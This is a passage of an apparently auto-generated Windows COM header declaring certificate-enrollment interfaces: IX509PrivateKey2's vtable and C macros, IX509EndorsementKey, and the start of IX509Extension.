        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_LegacyCsp )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Algorithm )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeySpec )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509KeySpec Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Length )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ExportPolicy )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ExportPolicy )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyExportFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyUsageFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyProtection )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyProtection )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509PrivateKeyProtection Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineContext )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_MachineContext )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Certificate )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UniqueContainerName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Opened )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultContainer )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Existing )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Existing )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Description )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HardwareKeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509HardwareKeyUsageFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_HardwareKeyUsage )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509HardwareKeyUsageFlags Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateStorageLocation )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateStorageLocation )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlgorithmName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlgorithmName )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlgorithmParameters )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlgorithmParameters )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParametersExportType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [retval][out] */ __RPC__out X509KeyParametersExportType *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParametersExportType )( 
            __RPC__in IX509PrivateKey2 * This,
            /* [in] */ X509KeyParametersExportType Value);
        
        END_INTERFACE
    } IX509PrivateKey2Vtbl;

    interface IX509PrivateKey2
    {
        CONST_VTBL struct IX509PrivateKey2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PrivateKey2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PrivateKey2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PrivateKey2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PrivateKey2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PrivateKey2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PrivateKey2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PrivateKey2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PrivateKey2_Open(This)	\
    ( (This)->lpVtbl -> Open(This) ) 

#define IX509PrivateKey2_Create(This)	\
    ( (This)->lpVtbl -> Create(This) ) 

#define IX509PrivateKey2_Close(This)	\
    ( (This)->lpVtbl -> Close(This) ) 

#define IX509PrivateKey2_Delete(This)	\
    ( (This)->lpVtbl -> Delete(This) ) 

#define IX509PrivateKey2_Verify(This,VerifyType)	\
    ( (This)->lpVtbl -> Verify(This,VerifyType) ) 

#define IX509PrivateKey2_Import(This,strExportType,strEncodedKey,Encoding)	\
    ( (This)->lpVtbl -> Import(This,strExportType,strEncodedKey,Encoding) ) 

#define IX509PrivateKey2_Export(This,strExportType,Encoding,pstrEncodedKey)	\
    ( (This)->lpVtbl -> Export(This,strExportType,Encoding,pstrEncodedKey) ) 

#define IX509PrivateKey2_ExportPublicKey(This,ppPublicKey)	\
    ( (This)->lpVtbl -> ExportPublicKey(This,ppPublicKey) ) 

#define IX509PrivateKey2_get_ContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerName(This,pValue) ) 

#define IX509PrivateKey2_put_ContainerName(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerName(This,Value) ) 

#define IX509PrivateKey2_get_ContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerNamePrefix(This,pValue) ) 

#define IX509PrivateKey2_put_ContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerNamePrefix(This,Value) ) 

#define IX509PrivateKey2_get_ReaderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ReaderName(This,pValue) ) 

#define IX509PrivateKey2_put_ReaderName(This,Value)	\
    ( (This)->lpVtbl -> put_ReaderName(This,Value) ) 

#define IX509PrivateKey2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509PrivateKey2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509PrivateKey2_get_CspStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatus(This,ppValue) ) 

#define IX509PrivateKey2_put_CspStatus(This,pValue)	\
    ( (This)->lpVtbl -> put_CspStatus(This,pValue) ) 

#define IX509PrivateKey2_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509PrivateKey2_put_ProviderName(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderName(This,Value) ) 

#define IX509PrivateKey2_get_ProviderType(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderType(This,pValue) ) 

#define IX509PrivateKey2_put_ProviderType(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderType(This,Value) ) 

#define IX509PrivateKey2_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define IX509PrivateKey2_put_LegacyCsp(This,Value)	\
    ( (This)->lpVtbl -> put_LegacyCsp(This,Value) ) 

#define IX509PrivateKey2_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PrivateKey2_put_Algorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_Algorithm(This,pValue) ) 

#define IX509PrivateKey2_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509PrivateKey2_put_KeySpec(This,Value)	\
    ( (This)->lpVtbl -> put_KeySpec(This,Value) ) 

#define IX509PrivateKey2_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PrivateKey2_put_Length(This,Value)	\
    ( (This)->lpVtbl -> put_Length(This,Value) ) 

#define IX509PrivateKey2_get_ExportPolicy(This,pValue)	\
    ( (This)->lpVtbl -> get_ExportPolicy(This,pValue) ) 

#define IX509PrivateKey2_put_ExportPolicy(This,Value)	\
    ( (This)->lpVtbl -> put_ExportPolicy(This,Value) ) 

#define IX509PrivateKey2_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#define IX509PrivateKey2_put_KeyUsage(This,Value)	\
    ( (This)->lpVtbl -> put_KeyUsage(This,Value) ) 

#define IX509PrivateKey2_get_KeyProtection(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyProtection(This,pValue) ) 

#define IX509PrivateKey2_put_KeyProtection(This,Value)	\
    ( (This)->lpVtbl -> put_KeyProtection(This,Value) ) 

#define IX509PrivateKey2_get_MachineContext(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineContext(This,pValue) ) 

#define IX509PrivateKey2_put_MachineContext(This,Value)	\
    ( (This)->lpVtbl -> put_MachineContext(This,Value) ) 

#define IX509PrivateKey2_get_SecurityDescriptor(This,pValue)	\
    ( (This)->lpVtbl -> get_SecurityDescriptor(This,pValue) ) 

#define IX509PrivateKey2_put_SecurityDescriptor(This,Value)	\
    ( (This)->lpVtbl -> put_SecurityDescriptor(This,Value) ) 

#define IX509PrivateKey2_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509PrivateKey2_put_Certificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Certificate(This,Encoding,Value) ) 

#define IX509PrivateKey2_get_UniqueContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_UniqueContainerName(This,pValue) ) 

#define IX509PrivateKey2_get_Opened(This,pValue)	\
    ( (This)->lpVtbl -> get_Opened(This,pValue) ) 

#define IX509PrivateKey2_get_DefaultContainer(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultContainer(This,pValue) ) 

#define IX509PrivateKey2_get_Existing(This,pValue)	\
    ( (This)->lpVtbl -> get_Existing(This,pValue) ) 

#define IX509PrivateKey2_put_Existing(This,Value)	\
    ( (This)->lpVtbl -> put_Existing(This,Value) ) 

#define IX509PrivateKey2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509PrivateKey2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509PrivateKey2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509PrivateKey2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509PrivateKey2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509PrivateKey2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509PrivateKey2_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define IX509PrivateKey2_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IX509PrivateKey2_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IX509PrivateKey2_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#define IX509PrivateKey2_put_Description(This,Value)	\
    ( (This)->lpVtbl -> put_Description(This,Value) ) 


#define IX509PrivateKey2_get_HardwareKeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_HardwareKeyUsage(This,pValue) ) 

#define IX509PrivateKey2_put_HardwareKeyUsage(This,Value)	\
    ( (This)->lpVtbl -> put_HardwareKeyUsage(This,Value) ) 

#define IX509PrivateKey2_get_AlternateStorageLocation(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateStorageLocation(This,pValue) ) 

#define IX509PrivateKey2_put_AlternateStorageLocation(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateStorageLocation(This,Value) ) 

#define IX509PrivateKey2_get_AlgorithmName(This,pValue)	\
    ( (This)->lpVtbl -> get_AlgorithmName(This,pValue) ) 

#define IX509PrivateKey2_put_AlgorithmName(This,Value)	\
    ( (This)->lpVtbl -> put_AlgorithmName(This,Value) ) 

#define IX509PrivateKey2_get_AlgorithmParameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AlgorithmParameters(This,Encoding,pValue) ) 

#define IX509PrivateKey2_put_AlgorithmParameters(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_AlgorithmParameters(This,Encoding,Value) ) 

#define IX509PrivateKey2_get_ParametersExportType(This,pValue)	\
    ( (This)->lpVtbl -> get_ParametersExportType(This,pValue) ) 

#define IX509PrivateKey2_put_ParametersExportType(This,Value)	\
    ( (This)->lpVtbl -> put_ParametersExportType(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PrivateKey2_INTERFACE_DEFINED__ */


#ifndef __IX509EndorsementKey_INTERFACE_DEFINED__
#define __IX509EndorsementKey_INTERFACE_DEFINED__

/* interface IX509EndorsementKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EndorsementKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("B11CD855-F4C4-4FC6-B710-4422237F09E9")
    IX509EndorsementKey : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ProviderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Opened( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddCertificate( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveCertificate( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCertificateByIndex( 
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [in] */ LONG dwIndex,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCertificateCount( 
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [retval][out] */ __RPC__out LONG *pCount) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ExportPublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Open( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Close( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EndorsementKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EndorsementKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EndorsementKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EndorsementKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EndorsementKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderName )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Opened )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *AddCertificate )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveCertificate )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificateByIndex )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [in] */ LONG dwIndex,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificateCount )( 
            __RPC__in IX509EndorsementKey * This,
            /* [in] */ VARIANT_BOOL ManufacturerOnly,
            /* [retval][out] */ __RPC__out LONG *pCount);
        
        HRESULT ( STDMETHODCALLTYPE *ExportPublicKey )( 
            __RPC__in IX509EndorsementKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey);
        
        HRESULT ( STDMETHODCALLTYPE *Open )( 
            __RPC__in IX509EndorsementKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Close )( 
            __RPC__in IX509EndorsementKey * This);
        
        END_INTERFACE
    } IX509EndorsementKeyVtbl;

    interface IX509EndorsementKey
    {
        CONST_VTBL struct IX509EndorsementKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EndorsementKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EndorsementKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EndorsementKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EndorsementKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EndorsementKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EndorsementKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EndorsementKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EndorsementKey_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509EndorsementKey_put_ProviderName(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderName(This,Value) ) 

#define IX509EndorsementKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509EndorsementKey_get_Opened(This,pValue)	\
    ( (This)->lpVtbl -> get_Opened(This,pValue) ) 

#define IX509EndorsementKey_AddCertificate(This,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> AddCertificate(This,Encoding,strCertificate) ) 

#define IX509EndorsementKey_RemoveCertificate(This,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveCertificate(This,Encoding,strCertificate) ) 

#define IX509EndorsementKey_GetCertificateByIndex(This,ManufacturerOnly,dwIndex,Encoding,pValue)	\
    ( (This)->lpVtbl -> GetCertificateByIndex(This,ManufacturerOnly,dwIndex,Encoding,pValue) ) 

#define IX509EndorsementKey_GetCertificateCount(This,ManufacturerOnly,pCount)	\
    ( (This)->lpVtbl -> GetCertificateCount(This,ManufacturerOnly,pCount) ) 

#define IX509EndorsementKey_ExportPublicKey(This,ppPublicKey)	\
    ( (This)->lpVtbl -> ExportPublicKey(This,ppPublicKey) ) 

#define IX509EndorsementKey_Open(This)	\
    ( (This)->lpVtbl -> Open(This) ) 

#define IX509EndorsementKey_Close(This)	\
    ( (This)->lpVtbl -> Close(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EndorsementKey_INTERFACE_DEFINED__ */


#ifndef __IX509Extension_INTERFACE_DEFINED__
#define __IX509Extension_INTERFACE_DEFINED__

/* interface IX509Extension */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Extension;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30d-217d-11da-b2a4-000e7bbb2b09")
    IX509Extension : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Critical( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Critical( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Extension * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Extension * This);
        
